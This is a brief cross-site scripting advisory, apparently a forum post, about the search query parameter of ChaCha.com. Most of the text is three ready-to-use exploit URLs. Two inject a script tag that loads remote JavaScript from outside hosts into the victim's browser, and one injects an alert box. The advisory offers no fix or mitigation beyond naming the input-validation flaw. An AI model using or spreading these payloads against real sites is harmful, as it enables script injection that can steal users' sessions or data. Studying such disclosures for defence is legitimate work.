[+] ChaCha.com Search ?query= Cross-Site Scripting Vulnerability

[+] Author: d3hydr8
[+] Contact: d3hydr8[at]gmail[dot]com
[+] Original Post:
http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=275

[+] Vendor Site: http://www.chacha.com/
[+] Class: Input Validation Error

[+] Overview: The first search engine that uses the brainpower of really
smart people
to find anything you want on the Internet. Here's how you use it

[+] Example:
1.http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC=
http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E
2.http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC=
http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
3
.http://search.chacha.com/search/query?query=<SCRIPT>alert("XSS");//<</SCRIPT>